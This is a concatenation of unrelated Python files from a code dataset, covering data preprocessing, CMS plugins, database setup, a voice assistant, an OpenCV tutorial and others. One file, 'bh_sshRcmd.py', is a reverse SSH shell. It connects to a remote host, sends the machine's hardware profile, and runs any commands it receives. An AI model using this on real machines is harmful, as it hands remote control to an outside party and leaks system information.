control=self.get_field(chars,mp.control)\n sc_loc=self.get_field(chars,mp.sc_loc)\n fight=self.get_field(chars,mp.fight)\n late = self.get_field(chars, mp.late)\n homework = self.get_field(chars, mp.homework)\n sh_accomp = self.get_field(chars, mp.sh_accomp)\n sh_poorp = self.get_field(chars, mp.sh_poorp)\n good_grec = self.get_field(chars, mp.good_grec)\n likes_s = self.get_field(chars, mp.likes_s)\n library = self.get_field(chars, mp.library)\n\n # Add this into transaction. Put all the fields into the list\n fields = [sex, race, score, lang_native, fam_comp,\n par_edu,income, s_expect, control, sc_loc,\n fight, late, homework, sh_accomp, sh_poorp,\n good_grec, likes_s, library]\n\n self.add_transaction(fields)\n # Performance measurements\n total_t = str(format(time.clock() - start_t, '.4f'))\n print(\"Preprocessing took {:>10} seconds\"\n .format(total_t))\n # Return number of transactions added\n return self.trans_count\n\n def get_field(self, line, mapper):\n \"\"\"\n Selects the appropriate preprocessing method according to line and mapper structure\n :param line: New line of data (str)\n :param mapper: Corresponding mapper structure of the field\n :return: Preprocessed field (str)\n \"\"\"\n value = line[mapper['STR'] - 1: mapper['END']]\n # Check the type and execute either discretize/binarize etc.\n if mapper['TYPE'] == 'BINARY':\n return self._is_name(mapper['COL'], mapper['VALS'][int(value)])\n elif mapper['TYPE'] == 'CATEGORICAL':\n return self.binarize(mapper, int(value)) # Change here later for OTHER field\n else:\n return self.discretize(mapper, float(value))\n\n def add_transaction(self, fields):\n \"\"\"\n Adds the preprocessed fields into the transaction list\n\n :param fields: Preprocessed fields (list)\n :return:\n \"\"\"\n self.trans_count += 1\n items = collections.OrderedDict()\n # Add the fields here, True is only used to have\n # OrderedSet kind of data structure\n items = collections.OrderedDict({f: True for f in fields}) # more pythonic way to populate\n self.count_unique(fields) # Updates unique dict\n # Use keys to sort the dict\n items = collections.OrderedDict(sorted(items.items(), key=lambda _: _[0]))\n t = {'ID': self.trans_count, 'ITEMS': items}\n self.transactions.append(t)\n\n def count_unique(self, fields):\n \"\"\"\n Updates the count of unique fields\n\n :param fields: List of fields\n :return:\n \"\"\"\n for f in fields:\n if f not in self.unique:\n self.unique[f] = 1\n else:\n self.unique[f] += 1\n self.unique = collections.OrderedDict(sorted(self.unique.items(), key=lambda _: 
_[0]))\n\n def discretize(self, mapper, col_data):\n \"\"\"\n Used to discretize the continous values from the given mapper and value\n :param mapper: Mapper of the continious field (Mapper Class)\n :param col_data: Value of the continous field (float)\n :return: Returns discretized name of the field (string)\n \"\"\"\n max = math.ceil(mapper['MAX'])\n min = math.floor(mapper['MIN'])\n interval = mapper['INTERVAL']\n step = (max - min) / interval\n # Initial check to decide in which range it belongs to\n lower = float(format(min, '.2f'))\n upper = float(format(lower + step, '.2f'))\n if col_data >= lower and col_data <= upper:\n str_interval = '[' + str(int(lower)) + '-' + str(int(upper)) + ']'\n # print('Lower : ' + str(lower) + ' Upper : ' + str(upper)\n # + ' Value : ' + str(col_data) + ' Interval : ' + str_interval)\n return self._is_name(mapper['COL'], str_interval)\n\n # Check the boundries until the end of the interval value\n for i in range(1, interval):\n lower = float(format(upper, '.2f'))\n upper = float(format(upper + step, '.2f'))\n if col_data >= lower and col_data <= upper:\n str_interval = '[' + str(int(lower)) + '-' + str(int(upper)) + ']'\n # print('Lower : ' + str(lower) + ' Upper : ' + str(upper)\n # + ' Value : ' + str(col_data) + ' Interval : ' + str_interval)\n return self._is_name(mapper['COL'], str_interval)\n\n raise ValueError('Value is not between the intervals check preprocessor::discretize')\n\n def binarize(self, mapper, col_data):\n \"\"\"\n Binarize the attribute data using mapper\n :param col_data: Categorical data assumed to be between -9 and 25\n :param mapper: Corresponding mapper of this field\n :return: Binarized field (str)\n \"\"\"\n if mapper is None:\n print(\"Give an appropriate mapper\")\n return\n\n if col_data < -9:\n raise ValueError('Values cannot be less than -9 - check binarize method in preprocess.py')\n\n # Change this, in case if we break something\n max_categorical_value = 25\n if col_data > max_categorical_value:\n raise ValueError('Values cannot be more than 25 - check binarize method in preprocess.py')\n\n # Return proper COL_IS_ATTR name\n if col_data in mapper['VALS'].keys():\n if mapper['OTHERS'] is not None:\n if col_data in mapper['OTHERS']:\n # Others\n nm = self._is_name(col=mapper['COL'], attr=\"OTHERS\")\n elif col_data in mapper['VALS']:\n # Map as standalone field\n nm = self._is_name(col=mapper['COL'], attr=mapper['VALS'][col_data])\n else:\n raise Exception(\"Something unusual in preprocessor::binarize happened\")\n else:\n # Map as standalone field\n nm = self._is_name(col=mapper['COL'], attr=mapper['VALS'][col_data])\n\n # Return the name\n return nm\n else:\n raise ValueError('This key is not inside our mapper VALS - check binarize method in preprocess.py')\n\n def save_transactions(self, path = \"transactions.csv\"):\n \"\"\"\n Save the preprocessed transactions into a file\n :param path: Path to be saved\n :return: Returns true on successful save\n \"\"\"\n print('Saving the transactions into {}'.format(path))\n start_t = time.clock()\n with open(path, 'w') as f:\n f.write(\"ID,ITEMS\\n\")\n for t in self.transactions:\n print_str = str(t['ID'])\n for i in t['ITEMS'].keys():\n print_str += \",\" + i\n print_str += \"\\n\"\n f.write(print_str)\n # Performance measurements\n total_t = str(format(time.clock() - start_t, '.4f'))\n print(\"Save procedure took {:>10} seconds\"\n .format(total_t))\n return True\n\n def _print_transactions(self):\n \"\"\"\n Used to print transactions in csv format\n :return:\n \"\"\"\n 
print_str = \"ID,ITEMS\\n\"\n for t in self.transactions:\n print_str += str(t['ID'])\n for i in t['ITEMS'].keys():\n print_str += \",\" + i\n print_str += \"\\n\"\n print(print_str)\n\n def _is_name(self, col, attr):\n \"\"\"\n Used to construct the itemset name with combination of column and attiribute\n :param col: Column name of the data (str)\n :param attr: Attribute name of the data (str)\n :return: Itemset name (str)\n \"\"\"\n return col.upper() + \"_IS_\" + attr.upper()\n\n # Until getting nice representation using files(possibly JSON) use this structure\n # later we can create the file structure and parser for that.\n class Mapper:\n \"\"\"\n Used to map the fields\n \"\"\"\n def __init__(self):\n # Some fields can change\n self.sex = {'COL': 'SEX', 'TYPE': 'BINARY', 'STR': 24, 'END': 25,\n 'OTHERS': None,\n 'VALS': {1: 'MALE', 2: 'FEMALE'}}\n\n # Combine fields that are in others together\n self.race = {'COL': 'RACE', 'TYPE': 'CATEGORICAL', 'STR': 26, 'END': 27,\n 'OTHERS': {4: 'HISP_NR', 5: 'HISP_RC', 3: 'BLACK'},\n 'VALS': {1: 'AMER', 2: 'ASIA', 3: 'BLACK',\n 4: 'HISP_NR', 5: 'HISP_RC', 6: 'MULT',\n 7: 'WHITE'}}\n\n # SCORE_IS-20_60 , 35.12\n self.score = {'COL': 'SCORE', 'TYPE': 'CONTINIOUS', 'STR': 106, 'END': 111,\n 'MIN': 20.91, 'MAX': 81.04, 'INTERVAL': 5}\n\n # Whether English is student's native language-composite\n self.lang_native = {'COL': 'ENG_LANG_NATIVE', 'TYPE': 'BINARY', 'STR': 28, 'END': 29,\n 'OTHERS': None,\n 'VALS': {0: 'NO', 1: 'YES'}}\n\n # Family composition\n self.fam_comp = {'COL': 'FAM', 'TYPE': 'CATEGORICAL', 'STR': 42, 'END': 43,\n 'OTHERS':{4: 'GG', 5: 'M', 6: 'F', 7: 'FEG', 8: 'MAG',9: 'HALFTIME'},\n 'VALS': {1: 'MF', 2: 'MG', 3: 'FG',\n 4: 'GG', 5: 'M', 6: 'F',\n 7: 'FEG', 8: 'MAG',9: 'HALFTIME'}}\n\n # Parents' highest level of education\n self.par_edu = {'COL': 'PAR_EDU', 'TYPE': 'CATEGORICAL', 'STR': 44, 'END': 45,\n 'OTHERS': None,\n 'VALS': {1: 'UHS', 2: 'HS', 3: 'US',\n 4: 'S', 5: 'UC', 6: 'C',\n 7: 'M', 8: 'PHD'}}\n\n # Total family income from all sources 2001-composite\n self.income = {'COL': 'INCOME', 'TYPE': 'CATEGORICAL', 'STR': 54, 'END': 55,\n 'OTHERS': {1: 'NONE', 2: '0-1K', 3: '1-5K'},\n 'VALS': {1: 'NONE', 2: '0-1K', 3: '1-5K',\n 4: '5-10K', 5: '10-15K', 6: '15-20K',\n 7: '20-25K', 8: '25-35K', 9: '35-50K',\n 10: '50-75K', 11: '75-100K',12: '100-200K',\n 13: '200K-more'}}\n\n # How far in school student thinks will get-composite\n self.s_expect = {'COL': 'S_EXPEC', 'TYPE': 'CATEGORICAL', 'STR': 72, 'END': 73,\n 'OTHERS': None,\n 'VALS': {-1:'UK',\n 1: 'UHS', 2: 'HS', 3: 'S',\n 4: 'UC', 5: 'C', 6: 'M',\n 7: 'PHD'}}\n\n # School control\n self.control = {'COL': 'SC_CTRL', 'TYPE': 'CATEGORICAL', 'STR': 253, 'END': 253,\n 'OTHERS': None,\n 'VALS': {1: 'PUB', 2: 'CAT', 3: 'PRI'}}\n\n # School urbanicity\n self.sc_loc = {'COL': 'SC_LOC', 'TYPE': 'CATEGORICAL', 'STR': 254, 'END': 254,\n 'OTHERS': None,\n 'VALS': {1: 'UR', 2: 'SUB', 3: 'RU'}}\n\n # Got into a physical fight at school\n self.fight = {'COL': 'FIGHT', 'TYPE': 'CATEGORICAL', 'STR': 336, 'END': 337,\n 'OTHERS': {-9: 'MISSING', -7: 'NOT_INTERV', -6: 'MUL_RESP'},\n 'VALS': {-9: 'MISSING', -7: 'NOT_INTERV', -6: 'MUL_RESP',\n 1: 'NEVER', 2: '1-2', 3: '2-MORE'}}\n\n # Got into a physical fight at school\n self.late = {'COL': 'LATE', 'TYPE': 'CATEGORICAL', 'STR': 358, 'END': 359,\n 'OTHERS': {-9: 'MISSING', -7: 'NOT_INTERV', -6: 'MUL_RESP'},\n 'VALS': {-9: 'MISSING', -7: 'NOT_INTERV', -6: 'MUL_RESP',\n 1: 'NEVER', 2: '1-2', 3: '3-6',\n 4: '7-9', 5: '10-more'}}\n\n # How often 
student completes homework\n self.homework = {'COL': 'HOMEWORK', 'TYPE': 'CATEGORICAL', 'STR': 1610, 'END': 1611,\n 'OTHERS': {-9: 'MISSING', -6: 'MUL_RESP', -4: 'NO_ASW',\n -3: 'SKIP_ANS',-1 : 'DONT_K'},\n 'VALS': {-9: 'MISSING', -6: 'MUL_RESP', -4: 'NO_ASW',\n -3: 'SKIP_ANS',-1 : 'DONT_K',\n 1: 'NEVER', 2: 'RARELY', 3: 'SOMET',\n 4: 'MOSTT', 5: 'ALLT'}}\n\n # Spoke to parents about accomplishments (English)\n self.sh_accomp = {'COL': 'SH_ACCOMP', 'TYPE': 'CATEGORICAL', 'STR': 1590, 'END': 1591,\n 'OTHERS': {-9: 'MISSING', -4: 'NO_ASW', -3: 'SKIP_ANS'},\n 'VALS': {-9: 'MISSING', -4: 'NO_ASW', -3: 'SKIP_ANS',\n 0: 'NO', 1: 'YES'}}\n\n #Spoke to parents about poor performance (English)\n self.sh_poorp = {'COL': 'SH_POORP', 'TYPE': 'CATEGORICAL', 'STR': 1582, 'END': 1583,\n 'OTHERS': {-9: 'MISSING', -6: 'MUL_RESP', -4: 'NO_ASW',\n -3: 'SKIP_ANS'},\n 'VALS': {-9: 'MISSING', -6: 'MUL_RESP', -4: 'NO_ASW',\n -3: 'SKIP_ANS',\n 0: 'NO', 1: 'YES'}}\n\n # Recognized for good grades\n self.good_grec = {'COL': 'RECOG', 'TYPE': 'CATEGORICAL', 'STR': 350, 'END': 351,\n 'OTHERS': {-9: 'MISSING', -7: 'NOT_INTERV', -6: 'MUL_RESP'},\n 'VALS': {-9: 'MISSING', -7: 'NOT_INTERV', -6: 'MUL_RESP',\n 0: 'NO', 1: 'YES'}}\n\n # How much likes school\n self.likes_s = {'COL': 'LIKES_S', 'TYPE': 'CATEGORICAL', 'STR': 428, 'END': 429,\n 'OTHERS': {-9: 'MISSING', -6: 'MUL_RESP',-1 : 'DONT_K'},\n 'VALS': {-9: 'MISSING', -6: 'MUL_RESP', -1 : 'DONT_K',\n 1: 'NO', 2: 'SOME', 3: 'YES'}}\n\n # Use of school library for assignments\n self.library = {'COL': 'LIBRARY', 'TYPE': 'CATEGORICAL', 'STR': 708, 'END': 709,\n 'OTHERS': {-9: 'MISSING', -7: 'NOT_INTERV', -6: 'MUL_RESP',\n -3: 'SKIP_ANS'},\n 'VALS': {-9: 'MISSING', -6: 'MUL_RESP', -1: 'DONT_K', -3: 'SKIP_ANS',\n -7: 'NOT_INTERV',\n 1: 'NEVER', 2: 'RARELY', 3: 'SOMET', 4: 'OFTEN'}}","sub_path":"src/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":17072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"102809438","text":"from cms.plugin_base import CMSPluginBase\nfrom cms.plugin_pool import plugin_pool\nfrom cms.models.pluginmodel import CMSPlugin\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom .models import Category, Project\n\n\nclass CategoriesPlugin(CMSPluginBase):\n model = CMSPlugin\n render_template = \"projects/plugins/categories.html\"\n cache = False\n name = _(\"Categories Plugin\")\n\n def render(self, context, instance, placeholder):\n context = super(CategoriesPlugin, self).render(context, instance, placeholder)\n context.update({\n 'categories': Category.objects.all()\n })\n return context\n\nplugin_pool.register_plugin(CategoriesPlugin)\n\n\nclass ProjectPlugin(CMSPluginBase):\n model = CMSPlugin\n render_template = \"projects/plugins/lopende-projecten.html\"\n cache = False\n name = _(\"Current Projects Plugin\")\n\n def render(self, context, instance, placeholder):\n context = super(ProjectPlugin, self).render(context, instance, placeholder)\n context.update({\n 'projects': Project.objects.filter(featured=True)\n })\n return context\n\nplugin_pool.register_plugin(ProjectPlugin)","sub_path":"projects/cms_plugins.py","file_name":"cms_plugins.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"225192577","text":"import configparser\nimport sys\nimport psycopg2\nimport sql_queries\n\ndef connect_db():\n \"\"\"\n Connects to DB (AWS Redshift)\n \n :return: DB 
Connection\n    \"\"\"\n    config = configparser.ConfigParser()\n    config.read_file(open('config/dwh.cfg'))\n    con = psycopg2.connect(\n        \"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values())\n    )\n    cur = con.cursor()\n\n    # do not close the connection here: the caller uses it and closes it in main()\n    return cur, con\n\n\ndef drop_tables(con, cur):\n    \"\"\"\n    Drop tables in DB\n\n    :param con: DB Connection\n    :param cur: DB Cursor\n    \"\"\"\n    try:\n        for query in sql_queries.drop_tables:\n            cur.execute(query)\n            con.commit()\n    except TypeError as e:\n        print(\"TypeError {}\".format(e))\n    except:\n        print(\"Unexpected error:\", sys.exc_info()[0])\n        raise\n\n\ndef create_tables(con, cur):\n    \"\"\"\n    Create tables in DB if they don't exist\n\n    :param con: DB Connection\n    :param cur: DB Cursor\n    \"\"\"\n    try:\n        for query in sql_queries.create_tables:\n            cur.execute(query)\n            con.commit()\n    except TypeError as e:\n        print(\"TypeError {}\".format(e))\n    except:\n        print(\"Unexpected error:\", sys.exc_info()[0])\n        raise\n\n\ndef main():\n    \"\"\"\n    Main executor\n    - Connect to DB\n    - [Redshift] drop existing tables\n    - [Redshift] create tables if they don't exist\n    \"\"\"\n    cur, con = connect_db()\n\n    drop_tables(con, cur)\n    create_tables(con, cur)\n\n    con.close()\n\n\nif __name__ == \"__main__\":\n    main()","sub_path":"project5_capstone/create_tables.py","file_name":"create_tables.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}{"seq_id":"573431757","text":"import wx\nimport wolframalpha\nimport wikipedia\nimport speech_recognition as sr\n# I chose not to enable eSpeak\n\nclass MyFrame(wx.Frame):\n    def __init__(self):\n        wx.Frame.__init__(self, None,\n                          pos=wx.DefaultPosition, size=wx.Size(450, 100),\n                          style=wx.MINIMIZE_BOX | wx.SYSTEM_MENU | wx.CAPTION |\n                                wx.CLOSE_BOX | wx.CLIP_CHILDREN,\n                          title=\"Pythonify\")\n        panel = wx.Panel(self)\n        my_sizer = wx.BoxSizer(wx.VERTICAL)\n        lbl = wx.StaticText(panel,\n                            label=\"Hello I am the Python Digital Assistant. 
How can I help you?\")\n my_sizer.Add(lbl, 0, wx.ALL, 5)\n self.txt = wx.TextCtrl(panel, style=wx.TE_PROCESS_ENTER,size=(400,30))\n self.txt.SetFocus()\n self.txt.Bind(wx.EVT_TEXT_ENTER, self.OnEnter)\n my_sizer.Add(self.txt, 0, wx.ALL, 5)\n panel.SetSizer(my_sizer)\n self.Show()\n\n def OnEnter(self, event):\n user_input = self.txt.GetValue()\n user_input = user_input.lower()\n\n # Voice recognition input\n if user_input == '':\n r = sr.Recognizer()\n with sr.Microphone() as source:\n audio = r.listen(source)\n try:\n # Modified so the passed data isn't unicode and the variable stores the value for later\n self.txt.SetValue(str(r.recognize_google(audio)))\n user_input = str(r.recognize_google(audio))\n except sr.UnknownValueError:\n print(\"Google Speech Recognition could not understand.\\nPlease try again.\")\n except sr.RequestError as e:\n print(\"Could not request results from Google Speech Recognition Service; {0}\".format(e))\n \n # Try to catch any disambugation and other exceptions\n try:\n # Wolfram\n app_id = \"YOUR-WOLFRAM-ID\"\n client = wolframalpha.Client(app_id)\n res = client.query(user_input)\n answer = next(res.results).text\n print(answer)\n except:\n # Wikipedia\n \"\"\" First, cleanse the string\n of 'who', 'what', 'where'\n queries to obtain info \"\"\"\n\n query_options = [\"who is\", \"what is\", \"where is\", \"what does\", \"how does\", \"who does\"]\n split_input = user_input.split(\" \")\n # Then it checks if the input string contains any of the query modifiers\n for option in query_options:\n if user_input.__contains__(option):\n for i in range(2): # Removes the very first thing in the list twice\n split_input.remove(split_input[0])\n # Rejoin the split input \n user_input = \" \".join(split_input)\n try:\n # Some common language shorthand codes just in case\n # en - English\n # de - German\n # zh - Chinese\n # es - Spanish\n # fr - French\n # ru - Russian\n wikipedia.set_lang(\"en\")\n # I personally like how short yet detailed 3 sentences can be\n result = wikipedia.summary(user_input, sentences=3)\n print(\"\\n\" + result + \"\\n\")\n # If the search passed Wolfram yet still finds an issue with disambiguation\n # then it iterates through the items neatly and restarts the search\n except wikipedia.exceptions.DisambiguationError as e:\n print(\"That didn't work. 
Try being more specific:\\n\")\n                for item in e.options:\n                    print(item)\n\nif __name__ == \"__main__\":\n    app = wx.App(True)\n    frame = MyFrame()\n    app.MainLoop()\n","sub_path":"PyDa-Complete.py","file_name":"PyDa-Complete.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}{"seq_id":"230698153","text":"import requests\nimport json\nimport os\nimport time, glob, uuid\n\n\ninput_dir = \"/home/srihari/anuvaad-toolkit/block_merger_latest/anuvaad/anuvaad-etl/anuvaad-extractor/document-processor/ocr/tesseract_ulca_v2/doc/bounding_box/hindi/*.jpg\"\nsave_path = \"report/\"\nlang = \"hi\"\n\nservice_url = \"http://0.0.0.0:5000/anuvaad/ocr/v0/ulca-ocr\"\n\n\ndef get_request(input_dir):\n    req = {\n        \"config\": {\n            \"language\": {\n                \"sourceLanguage\": lang\n            }\n        },\n        \"image\": []\n    }\n    images = glob.glob(input_dir)\n\n    for image in images:\n        # image_name = image.split(\"/\")[-1]\n        print(image)\n        req[\"image\"].append({\"local_path\": image})\n    return req\n\n\nif __name__ == \"__main__\":\n    print(\"ulca ocr service started\")\n    start_time = time.time()\n\n    req = get_request(input_dir)\n    print(req)\n    res = requests.post(service_url, json=req, timeout=None)\n    data = res.json()\n    file_id = save_path + str(uuid.uuid4()) + \".json\"\n    with open(file_id, \"w\") as outfile:\n        json.dump(data, outfile, ensure_ascii=True)\n","sub_path":"anuvaad-etl/anuvaad-extractor/document-processor/ocr/tesseract_ulca_v2/doc/test_batch.py","file_name":"test_batch.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}{"seq_id":"1558427","text":"#!/usr/bin/env python\n\"\"\"Scrapes a page to collect contents of comment divs\"\"\"\nfrom bs4 import BeautifulSoup\nimport urllib2, arrow\n\ncomments = []\nurl = raw_input(\"URL: \")\n\npage = urllib2.urlopen(url)\nsoup = BeautifulSoup(page, 'html.parser')\n\ncomment_box = soup.find('div', attrs={'class': 'comment'})\n\ncomment = comment_box.text.strip()\n\ncomments.append(comment)\n\n\n#tree = html.fromstring(pagescrape.content)\n#for elem in tree.xpath(\"//div[@class='comment '] | //div[@class='comment reply']\"):\n#    print etree.tostring(elem)\n","sub_path":"commentscraper.py","file_name":"commentscraper.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}{"seq_id":"236601957","text":"import tube\ntube.readCalibrationFile('CalibTable','/SNS/users/rwp/corelli/tube_calibration2/CalibTable2_combined.txt')\n\nfor run in range(81285,81405+1):\n    Load(Filename='CORELLI_{}'.format(run),\n         OutputWorkspace='run',\n         FilterByTofMin=1000,\n         FilterByTofMax=16666)\n    SetGoniometer(Workspace='run',\n                  Axis0='BL9:Mot:Sample:Axis3,0,1,0,1')\n    ApplyCalibration('run','CalibTable')\n    ConvertToMD(InputWorkspace='run',\n                OutputWorkspace='output',\n                QDimensions='Q3D',\n                dEAnalysisMode='Elastic',\n                Q3DFrames='Q_sample',\n                MinValues=[-15,-5,-15],\n                MaxValues=[15,5,15],\n                OverwriteExisting=False)\n\nFindPeaksMD(InputWorkspace='output', PeakDistanceThreshold=0.5, MaxPeaks=2000, OutputWorkspace='peaks')\nFindUBUsingFFT(PeaksWorkspace='peaks', MinD=5, MaxD=20)\nShowPossibleCells(PeaksWorkspace='peaks')\nSelectCellWithForm(PeaksWorkspace='peaks', FormNumber=26, Apply=True)\nIndexPeaks(PeaksWorkspace='peaks')\n\n\nSaveIsawPeaks('peaks', 
Filename='/SNS/users/rwp/corelli/cal_2018_10_Natrolite/peaks_tubeCal.peaks')\n","sub_path":"cal_2018_10_Natrolite/try_some_data_with_tube_cal.py","file_name":"try_some_data_with_tube_cal.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}{"seq_id":"85295534","text":"#io_module.py\n# -*- coding: utf-8 -*-\n\n# $Rev: 42 $: \n# $Author: ewald $: \n# $Date: 2013-03-03 11:30:40 +0100 (So, 03. Mär 2013) $:\n# $Id: io_module.py 42 2013-03-03 10:30:40Z ewald $ \n\n__version__ = \"$Revision: 42 $\"\n\nimport io\nimport os\nfrom messaging import stdMsg, dbgMsg, warnMsg, errMsg, setDebugging\nimport sys\nimport re\n\ndef isWritable(directory):\n    try:\n        tmp_prefix = \"tmp_file_for_write_testing\"\n        count = 0\n        filename = os.path.join(directory, tmp_prefix)\n        while os.path.exists(filename):\n            filename = \"{}.{}\".format(os.path.join(directory, tmp_prefix), count)\n            count += 1\n        f = open(filename, \"w\")\n        f.close()\n        os.remove(filename)\n        return True\n    except Exception as e:\n        dbgMsg(\"specified working directory \\'%s\\' is not writable!\\n\" % directory)\n        return False\n\n\ndef check_working_directory(directory):\n    dbgMsg(\"checking working directory %s\" % directory)\n    if not os.path.exists(directory):\n        errMsg(\"specified working directory \\'%s\\' does not exist!\\n\" % directory)\n        sys.exit(1)\n    if not os.path.isdir(directory):\n        errMsg(\"specified working directory \\'%s\\' is not a directory!\\n\" % directory)\n        sys.exit(1)\n    if not isWritable(directory):\n        errMsg(\"specified working directory \\'%s\\' is not writable!\\n\" % directory)\n        sys.exit(1)\n    return True\n\ndef check_database_file(directory, file_name):\n    fn = os.path.join(directory, file_name)\n    if not os.path.isfile(fn):\n        errMsg(\"Specified data base file \\'%s\\' does not exist!\\n\\n\" % fn)\n        sys.exit(1)\n    if not os.access(fn, os.R_OK):\n        errMsg(\"Specified data base file \\'%s\\' is not readable!\\n\\n\" % fn)\n        sys.exit(1)\n    if os.stat(fn).st_size == 0:\n        errMsg(\"Specified data base file \\'%s\\' has size of 0!\\n\\n\" % fn)\n        sys.exit(1)\n    return True\n\ndef check_float(string):\n    floatpattern = r'^[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?$'\n    m = re.match(floatpattern, string)\n    return m is not None\n\ndef input_float(string):\n    done = False\n    while not done:\n        text = raw_input(string)  # 'text' avoids shadowing the built-in input\n        done = check_float(text)\n    fp = float(text)\n    return fp\n","sub_path":"io_module.py","file_name":"io_module.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}{"seq_id":"167830679","text":"\"\"\"\r\nTutorial video 17: Morphological Transformation\r\n\r\nMorphological transformations are some simple operations based on the image shape. 
Normally performed on binary images.\r\nTwo inputs are required: the image and a structuring element called the kernel, which decides the nature of the operation.\r\nA kernel tells you how to change the value of any given pixel by combining it with different amounts of neighbouring pixels.\r\n\r\nUsed to remove noise, isolate individual elements, and find intensity bumps or holes in an image.\r\n\"\"\"\r\nimport cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\"\"\"\r\nimg=cv2.imread('smarties.png',cv2.IMREAD_GRAYSCALE)# a plain 0 would have done\r\n# we need a mask for the transformation which we get from simple thresholding\r\n\"\"\"\r\nimg=cv2.imread('LinuxLogo.jpg',0)\r\n_, mask=cv2.threshold(img,220,255,cv2.THRESH_BINARY_INV)\r\n# some black dots appear on the balls (white area) because of reflections on the balls\r\n\r\nkernel=np.ones((4,4),np.uint8)# here the kernel structure is a 4x4 square\r\n\r\ndilation=cv2.dilate(mask,kernel,iterations=2)# morphological transformation\r\n# takes the maximal pixel value overlapped by the kernel and replaces the pixel at the anchor position with that maximal value\r\n# removes/reduces uncertainties smaller than the kernel size, based on neighbouring pixels\r\n# the more iterations, the more times it will be dilated\r\n# if the kernel size is increased, larger uncertainties also merge, e.g. the shadow in the image merges with the ball for kernel=(5,5)\r\n# hence dilation enlarges the brighter portion\r\n\r\nerosion=cv2.erode(mask,kernel,iterations=2)# morphological transform\r\n# Like soil erosion, it erodes away the boundaries of the foreground object. The kernel slides through the image\r\n# and a pixel stays 1 only if all pixels under the kernel are 1, otherwise it becomes 0\r\n# here it operates on the minimal pixel value\r\n# it makes the white object smaller\r\n\r\nopening=cv2.morphologyEx(mask,cv2.MORPH_OPEN,kernel)\r\n# erosion followed by dilation\r\n\r\nclosing=cv2.morphologyEx(mask,cv2.MORPH_CLOSE,kernel)\r\n# dilation followed by erosion\r\n\r\nmg=cv2.morphologyEx(mask,cv2.MORPH_GRADIENT,kernel)\r\n# gradient: gets the boundary of objects; difference between dilation and erosion\r\nth=cv2.morphologyEx(mask,cv2.MORPH_TOPHAT,kernel)\r\n# top hat: 
difference between image and opening of image\r\nbh=cv2.morphologyEx(mask,cv2.MORPH_BLACKHAT,kernel)\r\n#black hat\r\ntitles=['Image','mask','Dilation','Erosion','Opening','Closing','Gradient','Top hat','Black hat']\r\nimages=[img, mask,dilation,erosion,opening,closing,mg,th,bh]\r\n \r\nfor i in range(9):\r\n plt.subplot(3,3,i+1),plt.imshow(images[i],'gray')\r\n plt.title(titles[i])\r\n plt.xticks([]),plt.yticks([])\r\n\r\nplt.show()","sub_path":"opencv_tutorial/Tut10_MorphTransform.py","file_name":"Tut10_MorphTransform.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"371106274","text":"import threading\nimport paramiko\nimport subprocess\nimport sys\ndef ssh_command(ip, port, user, command):\n client = paramiko.SSHClient()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n client.connect(ip, username=user, port=port)\n ssh_session = client.get_transport().open_session()\n if ssh_session.active:\n ssh_session.send(subprocess.check_output(\"system_profiler SPHardwareDataType\", shell=True))\n while True:\n command = ssh_session.recv(1024).decode()\n try:\n cmd_output = subprocess.check_output(command, shell=True)\n ssh_session.send(cmd_output)\n except Exception as e:\n ssh_session.send(str(e))\n client.close()\nssh_command(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])","sub_path":"bh_sshRcmd.py","file_name":"bh_sshRcmd.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"208959090","text":"\"\"\"\n Copyright (c) 2020 Intel Corporation\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n\nimport json\nimport os\n\nfrom ote import MMACTION_TOOLS\nfrom ote.utils.misc import run_through_shell\n\nfrom .base import BaseEvaluator\nfrom ..registry import EVALUATORS\n\n\n@EVALUATORS.register_module()\nclass MMActionEvaluator(BaseEvaluator):\n\n def _get_tools_dir(self):\n return MMACTION_TOOLS\n\n def _get_metric_functions(self):\n from ote.metrics.classification.common import mean_accuracy_eval\n\n return [mean_accuracy_eval]\n\n def _get_image_shape(self, cfg):\n image_size = cfg.input_img_size if isinstance(cfg.input_img_size, (tuple, list)) else [cfg.input_img_size] * 2\n assert len(image_size) == 2\n\n image_shape = [cfg.input_clip_length, image_size[0], image_size[1]]\n image_shape = ' '.join([str(x) for x in image_shape])\n\n return image_shape\n\n def _get_complexity_and_size(self, cfg, config_path, work_dir, update_config):\n image_shape = self._get_image_shape(cfg)\n tools_dir = self._get_tools_dir()\n\n res_complexity = os.path.join(work_dir, 'complexity.json')\n update_config = ' '.join([f'{k}={v}' for k, v in update_config.items()])\n update_config = f' --update_config {update_config}' if update_config else ''\n update_config = update_config.replace('\"', 